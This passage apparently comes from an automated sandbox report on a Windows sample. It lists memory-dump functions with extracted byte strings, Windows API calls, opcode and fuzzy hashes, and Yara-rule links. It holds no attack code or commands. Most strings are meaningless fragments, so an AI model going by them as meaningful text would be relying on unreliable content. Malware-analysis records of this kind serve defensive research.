kA^, xrefs: 013ECAF9
^\], xrefs: 013EC662
`3", xrefs: 013EC732
hKp, xrefs: 013EC82F
x8H, xrefs: 013EC825
kA^, xrefs: 013ECA71
dk;, xrefs: 013EC6EE

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ^\]$`3"$dk;$hKp$kA^$kA^$x8H
API String ID: 0-1464862232
Opcode ID: 84976a1cd633d7b3497980f9677a4d8e06e04516449b4ee589357d14ca95b44a
Instruction ID: 713a9f16f72b37d2e74313f2528777b18d819827bf783c6300c3c3747e8a018a
Opcode Fuzzy Hash: 84976a1cd633d7b3497980f9677a4d8e06e04516449b4ee589357d14ca95b44a
Instruction Fuzzy Hash: CB021371D0032DDBDF28CFA5D94AAEEBBB1FB44318F208159D516BA2A0D7B40A45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C849D, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,6E4C83B9,00000000,?,6E4C8550,00000000), ref: 6E4C849F
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,6E4C83B9,00000000,?,6E4C8550,00000000), ref: 6E4C84C5
HeapAlloc.KERNEL32(00000000), ref: 6E4C84CC
InitializeSListHead.KERNEL32(00000000), ref: 6E4C84D9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E4C84EE
HeapFree.KERNEL32(00000000), ref: 6E4C84F5

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 1d438fd1963b9ee96e28c6b4c3fa844ec3fe44fbbfa86ac3eacb8c2d52a8e70a
Instruction ID: 1b08ac23803ebe0a30c0e13048a0c01afb25c9519b3e1326fb9c4b73a3f28821
Opcode Fuzzy Hash: 1d438fd1963b9ee96e28c6b4c3fa844ec3fe44fbbfa86ac3eacb8c2d52a8e70a
Instruction Fuzzy Hash: 9BF06236200B029BDB51AFB99C18F1776B8BF8AB66F01482EF945D3349EF30F4008661

Uniqueness

Uniqueness Score: -1.00%

Function 013FECE3, Relevance: 8.9, Strings: 7, Instructions: 195COMMON

Download Yara Rule

Strings

mU6, xrefs: 013FED5D
"il, xrefs: 013FEEE0
WA|, xrefs: 013FEE28
, xrefs: 013FEE13
LX, xrefs: 013FEE81
30, xrefs: 013FEF1F
oZ, xrefs: 013FEE51

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: $"il$30$LX$WA|$mU6$oZ
API String ID: 0-1531084893
Opcode ID: 91f9c8f2284525cf01490cf23f956b086f2dc8d893345e47fbea2531c7bdbc3f
Instruction ID: 9e07db770f2102ff40e5994ab1e55e7f3fa2241d4392006b4fccd65d1a9da0f7
Opcode Fuzzy Hash: 91f9c8f2284525cf01490cf23f956b086f2dc8d893345e47fbea2531c7bdbc3f
Instruction Fuzzy Hash: 399145728083419FD354CF29D58941BFBF5BBD4358F114A1DF699A6260D3B1CA498F83

Uniqueness

Uniqueness Score: -1.00%

Function 013F0ADE, Relevance: 8.1, Strings: 6, Instructions: 592COMMON

Download Yara Rule

Strings

s=E, xrefs: 013F0E55
H, xrefs: 013F126B
<;, xrefs: 013F1219
n, xrefs: 013F1049
Nw, xrefs: 013F1284
sWP, xrefs: 013F0F86

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: <;$Nw$s=E$sWP$H$n
API String ID: 0-3418553609
Opcode ID: b604b537f2e1ae6b43ec49d6dd5891eb38ffd6a8978af944b6df5a4a42b3310c
Instruction ID: d88613e583e895f8a57f364888db06473d4c9bf41fc45c9c433d15b48da95e72
Opcode Fuzzy Hash: b604b537f2e1ae6b43ec49d6dd5891eb38ffd6a8978af944b6df5a4a42b3310c
Instruction Fuzzy Hash: C0621171508381CFE374CF29C589B8BBBE1BBD5318F10891DE69A962A0D7B18849CF53

Uniqueness

Uniqueness Score: -1.00%

Function 013F90BA, Relevance: 7.9, Strings: 6, Instructions: 381COMMON

Download Yara Rule

Strings

d, xrefs: 013F9530
9L3, xrefs: 013F9461
6m, xrefs: 013F9264
N?3, xrefs: 013F9570
d4#, xrefs: 013F954A
Q( , xrefs: 013F93B3

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 6m$9L3$N?3$Q( $d$d4#
API String ID: 0-2083278446
Opcode ID: 1712f0eb1bba02c6c7b52acee5486f5ec347b357f5ee2dcc53a5ddea585aa221
Instruction ID: 502c283877a7d4486ca8237767108420ea6b52da98ecedf3cf34e0ac0aaaf789
Opcode Fuzzy Hash: 1712f0eb1bba02c6c7b52acee5486f5ec347b357f5ee2dcc53a5ddea585aa221
Instruction Fuzzy Hash: D3122272508380DFD368CF69C58AA4BBBE1BBC4758F11891DF6D986260D7B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013E9384, Relevance: 7.8, Strings: 6, Instructions: 332COMMON

Download Yara Rule

Strings

\K:, xrefs: 013E946D
qo9, xrefs: 013E957E
9E3, xrefs: 013E9566
]C, xrefs: 013E95BA
?{, xrefs: 013E955E
G=, xrefs: 013E986E

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 9E3$?{$G=$\K:$]C$qo9
API String ID: 0-233201734
Opcode ID: fae19de7506d22b7ddb458b5398bc36fdabdb8cc2abc9724e6d6370de8bb0a91
Instruction ID: 5959e334fa5c0ccb76fe4ad70b7fe678b142e38d48dded99ae12c410cf9e1682
Opcode Fuzzy Hash: fae19de7506d22b7ddb458b5398bc36fdabdb8cc2abc9724e6d6370de8bb0a91
Instruction Fuzzy Hash: CC021071508341DFD368CF25D58AA4BFBF2BBC4758F108A1DF19A862A0D7B19949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 013EE21C, Relevance: 7.8, Strings: 6, Instructions: 316COMMON

Download Yara Rule

Strings

?Hn, xrefs: 013EE41A
}q, xrefs: 013EE5B0
vi, xrefs: 013EE342
QY, xrefs: 013EE551
GD, xrefs: 013EE311
|t|o, xrefs: 013EE36A

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ?Hn$GD$QY$vi$|t|o$}q
API String ID: 0-2058854943
Opcode ID: efe512d5a082baa928f9001d0169ca017cc6965180486205ab7ab3ba19fc5ca4
Instruction ID: 8c6a71467bb760ce03bece78dc9f3a5f83d96d6ab0120fb750a662c51d42f3ce
Opcode Fuzzy Hash: efe512d5a082baa928f9001d0169ca017cc6965180486205ab7ab3ba19fc5ca4
Instruction Fuzzy Hash: FBE132B29083419FD768CF25C88994BFBE5BBD4718F00892DF595962A0E7B5D908CF83

Uniqueness

Uniqueness Score: -1.00%

Function 013EDAAE, Relevance: 7.8, Strings: 6, Instructions: 255COMMON

Download Yara Rule

Strings

i;^, xrefs: 013EDB68
Z~, xrefs: 013EDCB3
4,uE, xrefs: 013EDD99
H9, xrefs: 013EDD18
D, xrefs: 013EDF1F
Cf, xrefs: 013EDE49

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 4,uE$Cf$D$H9$i;^$Z~
API String ID: 0-3499028901
Opcode ID: ce62088d7db4613c3b6f2b8b765a387ca39336382fe89b83945e178a501d370d
Instruction ID: b23ccf02f191705f7ee056c28879f73a8c784ec7f40cf6ac64924e4f0f8883d2
Opcode Fuzzy Hash: ce62088d7db4613c3b6f2b8b765a387ca39336382fe89b83945e178a501d370d
Instruction Fuzzy Hash: 77D11F725083819FD365CF66C98AA1FFBE1BBD4758F108D1DF29A86260D3B58909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 013FDEF4, Relevance: 7.7, Strings: 6, Instructions: 247COMMON

Download Yara Rule

Strings

fR, xrefs: 013FE177
K,, xrefs: 013FE1D8
t\E, xrefs: 013FE306
ep#, xrefs: 013FE001
,jF, xrefs: 013FE0DA
t\E, xrefs: 013FE20F

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ,jF$K,$ep#$t\E$t\E$fR
API String ID: 0-1899525808
Opcode ID: 46fde5a4ea55807c075f001ee8bf30ee340fa7d38df5625f0ae1c54080815783
Instruction ID: 89b6b98bab5bee204fa95402a02ed3989635310208dc1e4b9c90d0d598c62152
Opcode Fuzzy Hash: 46fde5a4ea55807c075f001ee8bf30ee340fa7d38df5625f0ae1c54080815783
Instruction Fuzzy Hash: 06B112715093809FD358CF6AD58981BBBE1FBC4758F408A2EF29696260D3B5D909CF06

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E60E4, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

Part of subcall function 6E4DA294: _free.LIBCMT ref: 6E4DA2EF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E4E61F0
IsValidCodePage.KERNEL32(00000000), ref: 6E4E624B
IsValidLocale.KERNEL32(?,00000001), ref: 6E4E625A
GetLocaleInfoW.KERNEL32(?,00001001,6E4DB71F,00000040,?,6E4DB83F,00000055,00000000,?,?,00000055,00000000), ref: 6E4E62A2
GetLocaleInfoW.KERNEL32(?,00001002,6E4DB79F,00000040), ref: 6E4E62C1

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: 7d2768596c38fdc151203c47424734d6cab8b824620af3503d49ef94ba426c43
Instruction ID: f14fba6f6a89cc42518737fbc63d5220bba6154381989925c18fbccf4372b171
Opcode Fuzzy Hash: 7d2768596c38fdc151203c47424734d6cab8b824620af3503d49ef94ba426c43
Instruction Fuzzy Hash: 1F5181719102069FEF51DFF5CC50EAEB3B8BF05706F0044AAEA24E7641E770A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013E9E22, Relevance: 7.6, Strings: 6, Instructions: 114COMMON

Download Yara Rule

Strings

$q0M, xrefs: 013E9EE5
9, xrefs: 013E9F4E
Fhe , xrefs: 013E9F02
~6, xrefs: 013E9ECD
e_, xrefs: 013E9F12
(, xrefs: 013E9F2E

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: $q0M$Fhe $~6$($9$e_
API String ID: 0-442829948
Opcode ID: c03cba4340b7ad78a43b7e0567f30b73c191a54175642ccc6c5914df96203c75
Instruction ID: cf6efe6ce9d968fbd4c626ecad058c8551ceac131b4efb0b0dbe54b3a5b9c99d
Opcode Fuzzy Hash: c03cba4340b7ad78a43b7e0567f30b73c191a54175642ccc6c5914df96203c75
Instruction Fuzzy Hash: A65162724083518BC758CF14D48941BBFE8FBD436CF504A1DF5AA662A1D3B58A4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D3780, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 469COMMON

Download Yara Rule

Strings

9BNn, xrefs: 6E4D3BAC, 6E4D3BC2
9BNn, xrefs: 6E4D379D, 6E4D394A, 6E4D3B77, 6E4D3B10, 6E4D3998, 6E4D3926

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 9BNn$9BNn
API String ID: 0-660966956
Opcode ID: 8fb410383caaa7acc65429232e6d05084c5e6130ecc2ca8dd5f12eb1bacced4b
Instruction ID: 0ddae26127173baa1adfadfb5d7e72284b71d0103e0195a026651d2fad890cf7
Opcode Fuzzy Hash: 8fb410383caaa7acc65429232e6d05084c5e6130ecc2ca8dd5f12eb1bacced4b
Instruction Fuzzy Hash: 50023B71E042199FDF14CFA9C894B9DBBF1EF48314F1582AAE819E7344D731A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013EA3DF, Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

aj`, xrefs: 013EAAD1
aj`, xrefs: 013EA961
%VwK, xrefs: 013EA9C2
:b-, xrefs: 013EA6CA
,,d, xrefs: 013EA6AD

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: %VwK$,,d$:b-$aj`$aj`
API String ID: 0-266388962
Opcode ID: aba49e09e1b169f01f5fe272c7566866274d13ae06ff70429803a4000218aff4
Instruction ID: 73f0a2963e79246fccc6158d567068bc627cb7b17c84778b36f28ea5770dc6b7
Opcode Fuzzy Hash: aba49e09e1b169f01f5fe272c7566866274d13ae06ff70429803a4000218aff4
Instruction Fuzzy Hash: CD0220B15083819FD7A8CF25C589A9BBBF1FBD1758F10891DF29A86260C7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 01401343, Relevance: 6.5, Strings: 5, Instructions: 276COMMON

Download Yara Rule

Strings

$F, xrefs: 014016C1
Wv, xrefs: 01401865
$, xrefs: 014013D6
$8 i, xrefs: 014015BA
0{, xrefs: 014016A7

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: $$$8 i$$F$Wv$0{
API String ID: 0-2166306512
Opcode ID: 42c404f0374206f1b82f374a802748e28f2c96b3986274918e3abb69b2fd42ab
Instruction ID: a4d6fe2c9514aed4cb18fbbe205f240f350fa7e24fa025fff9657b36dab46254
Opcode Fuzzy Hash: 42c404f0374206f1b82f374a802748e28f2c96b3986274918e3abb69b2fd42ab
Instruction Fuzzy Hash: 74D112724083809FD769CF65C589A5BFBF1FB84758F10891DF2AA86260D7B58949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 013FF14D, Relevance: 6.5, Strings: 5, Instructions: 248COMMON

Download Yara Rule

Strings

@L, xrefs: 013FF2CC
4z], xrefs: 013FF34F
J`m, xrefs: 013FF21C
sc, xrefs: 013FF2AF
eI, xrefs: 013FF3C1

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 4z]$J`m$eI$sc$@L
API String ID: 0-10485883
Opcode ID: b156c85bd54c8791c320603a694168f43bf4d5faab91bbb5937835ffd504a733
Instruction ID: 6044c6bf5a80904f3d57ad8a8b5cac467252ec9c6e8c08242368100fe7163a96
Opcode Fuzzy Hash: b156c85bd54c8791c320603a694168f43bf4d5faab91bbb5937835ffd504a733
Instruction Fuzzy Hash: 7BC11D720083819FC369DF25C58941BBBF1FB89748F508A1EF6A696260C3B5D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013E4F8E, Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

F], xrefs: 013E5116
=od, xrefs: 013E514C
p9<, xrefs: 013E5017
7], xrefs: 013E519D
T@, xrefs: 013E50DD

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 7]$=od$F]$T@$p9<
API String ID: 0-1412243312
Opcode ID: 1efeb0b6eb8c1afa8960311461881db8ec120658ffac5c5ae527576af47d82a8
Instruction ID: 9c2d2985d70cfb33650972e8fa1abf286034dd4890591795c981d924a53426f8
Opcode Fuzzy Hash: 1efeb0b6eb8c1afa8960311461881db8ec120658ffac5c5ae527576af47d82a8
Instruction Fuzzy Hash: 8BB13072508341AFD368CF25D98A90FBBF1BBC5748F50891DF299962A0D3B58949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 013ECC8D, Relevance: 6.5, Strings: 5, Instructions: 208COMMON

Download Yara Rule

Strings

V), xrefs: 013ECDA4
LZ\9, xrefs: 013ECED0
<yG0, xrefs: 013ECD59
oQAa, xrefs: 013ECE6B
*, xrefs: 013ECE1B

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: *$<yG0$LZ\9$V)$oQAa
API String ID: 0-2624737150
Opcode ID: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction ID: df1d6c21f0702dab576bb2dab5685fc3e4c7bf4ea60d8f0cba5be71eec6bb1d8
Opcode Fuzzy Hash: 8dec90755a9410a4b09f17b9831070af93044a3984fdd92c579cf4649da2be5c
Instruction Fuzzy Hash: 4EA12E711083429BD768CE65998995FBBF1FBD5788F005A1CF686822A0D7B1CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 013F1C10, Relevance: 6.4, Strings: 5, Instructions: 173COMMON

Download Yara Rule

Strings

u}s, xrefs: 013F1D74
En, xrefs: 013F1DE0
i"y, xrefs: 013F1D8C
V;, xrefs: 013F1DFB
q"}, xrefs: 013F1E42

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: En$i"y$q"}$u}s$V;
API String ID: 0-780694712
Opcode ID: 8a27501160b5192c23f4efd9ac5ef2dc63a9c894ab164665837abe52e701cca5
Instruction ID: 9f639f0f812db051852e81d24280ea98607566b44b45dbb172f5ec2612b40b51
Opcode Fuzzy Hash: 8a27501160b5192c23f4efd9ac5ef2dc63a9c894ab164665837abe52e701cca5
Instruction Fuzzy Hash: 258131714093429FC358DF65D58A40BFBF1BBD8748F405A2DF696A6220C7B1CA59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 013E55E8, Relevance: 6.4, Strings: 5, Instructions: 168COMMON

Download Yara Rule

Strings

ng, xrefs: 013E5724
\RN, xrefs: 013E57AE
}, xrefs: 013E5605
,a, xrefs: 013E5771
6", xrefs: 013E55EE

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ,a$6"$\RN$ng$}
API String ID: 0-2188652094
Opcode ID: 92d6ed94c3150d6e2ca2af1262c07931ca9ec3ede59de2428ff94a935e6c7290
Instruction ID: 14bb6fef0050155be47831feddb334e6b4ba0175f231d078f8adfe2d1a23e252
Opcode Fuzzy Hash: 92d6ed94c3150d6e2ca2af1262c07931ca9ec3ede59de2428ff94a935e6c7290
Instruction Fuzzy Hash: AF812E711083419FC358DF65C58A81BFBE1BBD4758F50891DF29696260D3B5CA4ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E57AC, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E4DB726,?,?,?,?,6E4DB318,?,00000004), ref: 6E4E588E
_wcschr.LIBVCRUNTIME ref: 6E4E591E
_wcschr.LIBVCRUNTIME ref: 6E4E592C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E4DB726,00000000,6E4DB846), ref: 6E4E59CF

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: 0ed5c187a2fee32d25acdf5e1965192483b769866e421ee03a854bbdbc33d8b4
Instruction ID: 98cd10066135727493178ed6ce71343342200fe3255380cff7e40284aa422e8b
Opcode Fuzzy Hash: 0ed5c187a2fee32d25acdf5e1965192483b769866e421ee03a854bbdbc33d8b4
Instruction Fuzzy Hash: 93611931A00206AAEB149BF5DC51EE673ACFF05716F14082FE915DBA80EB78E904C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C5239, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C523E
UnhandledExceptionFilter.KERNEL32(6E4EB3CC,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C5247
GetCurrentProcess.KERNEL32(C0000409,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C5252
TerminateProcess.KERNEL32(00000000,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C5259

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e2bec9d55bbf01a940eff027c1d50f51a03f0db9de6935097b4aa8d6d7675381
Instruction ID: 09a68c302f1def6ff66c21693d4e41e5950d726f4c0b480416975e72a4809ca7
Opcode Fuzzy Hash: e2bec9d55bbf01a940eff027c1d50f51a03f0db9de6935097b4aa8d6d7675381
Instruction Fuzzy Hash: 5CD01232000B08EBCE213BF0E90CA88BF28EB0A7A2F044000F70A8206ACB3164408B62

Uniqueness

Uniqueness Score: -1.00%

Function 01401A3C, Relevance: 5.5, Strings: 4, Instructions: 504COMMON

Download Yara Rule

Strings

78, xrefs: 014021C8
K_<, xrefs: 014020DA
'>, xrefs: 01401B3C
q^>, xrefs: 01401AD0

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: '>$78$K_<$q^>
API String ID: 0-578490123
Opcode ID: 711aa2ba3898f62b4552050d8da5d3376a1d2377ce2f030cda92242e71a997f9
Instruction ID: 29fb18c6cc0b294bd60a793da3a56d0032ba411d1b5c8013efb811ab2722f37e
Opcode Fuzzy Hash: 711aa2ba3898f62b4552050d8da5d3376a1d2377ce2f030cda92242e71a997f9
Instruction Fuzzy Hash: F0420471508381DFD379CF25C989B8BBBE2BBC4744F10891DE6C9962A0DBB18949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BBC70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,49F8414E,00000000,?), ref: 6E4BBCDE

Strings

\PerfmonBar\config.xml, xrefs: 6E4BBD92

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: 493037e4a0079f000066ffc17364235252c176be242eee1a3535ca54b859f2ef
Instruction ID: 4f083e8fcefc853d116541cfe64f014ea5e97768256925a05de6b9524a8957f5
Opcode Fuzzy Hash: 493037e4a0079f000066ffc17364235252c176be242eee1a3535ca54b859f2ef
Instruction Fuzzy Hash: 7D71B371D106589FDB20CFA4CD84F9EB7B4FB48714F10469AE919A7380DB70AA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013F2FA2, Relevance: 5.4, Strings: 4, Instructions: 377COMMON

Download Yara Rule

Strings

M/, xrefs: 013F3376
X', xrefs: 013F312F
:]@^, xrefs: 013F34D8
iz, xrefs: 013F326B

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: X'$:]@^$M/$iz
API String ID: 0-798460462
Opcode ID: 09530d5e08c15ecb41f324076e35a5c92c43a2524f3064df4ba0ab51a5735fce
Instruction ID: f1f255d46d94009b9e796dd1e6103196e285fe3972da1a175f046030302fe42b
Opcode Fuzzy Hash: 09530d5e08c15ecb41f324076e35a5c92c43a2524f3064df4ba0ab51a5735fce
Instruction Fuzzy Hash: A30250B1509380DFD368CF25C689A5BBBF1FBC4718F10891DE69A9A260D7B48909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013F056A, Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

H9I9, xrefs: 013F0816
gE", xrefs: 013F06F4
o%, xrefs: 013F06CA
h.X, xrefs: 013F0660

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: H9I9$gE"$h.X$o%
API String ID: 0-2007577475
Opcode ID: f1bdb9da26d39e93573244c6ea3749d79e0b31abc0a4a58e21ed3d18fe9c4cd8
Instruction ID: cd81ec0a7ce2f9b6cc33d1189c64e3e128983719c762242b0a7b3df0f3a58c70
Opcode Fuzzy Hash: f1bdb9da26d39e93573244c6ea3749d79e0b31abc0a4a58e21ed3d18fe9c4cd8
Instruction Fuzzy Hash: 29D12D715083808FD368CF69C58965FFBF2BB85718F108A1DF2AA96260D3B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013FF83F, Relevance: 5.2, Strings: 4, Instructions: 240COMMON

Download Yara Rule

Strings

:gy, xrefs: 013FFC54
9a, xrefs: 013FFA7E
e. , xrefs: 013FFA1D
8V, xrefs: 013FFA4E

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: 8V$9a$:gy$e.
API String ID: 0-1083161237
Opcode ID: 03cc1c01f2aa42faca73fd42d8b9637e3a4ed0e711a9f333acd8c0b2a276819f
Instruction ID: 7bc466bd2ecf686fa47b6f31480945543b5c51fbaf30f5dd83dc823eee8cea85
Opcode Fuzzy Hash: 03cc1c01f2aa42faca73fd42d8b9637e3a4ed0e711a9f333acd8c0b2a276819f
Instruction Fuzzy Hash: B3B140725093809FC358CF2AC58891BFBE5FBC8B58F408A1DF69596260C7B5D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 013FD091, Relevance: 5.2, Strings: 4, Instructions: 210COMMON

Download Yara Rule

Strings

mZf3, xrefs: 013FD2E9
(, xrefs: 013FD20A
-, xrefs: 013FD16B
}]}, xrefs: 013FD0CF

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ($-$mZf3$}]}
API String ID: 0-2410773837
Opcode ID: ccf372d09bc0778175b6081f50476668050fb595c593df019c774ccafc5d06fe
Instruction ID: 937881166a185f200099836d4f0c9f116a328ab727551cac6ad632a3849c9609
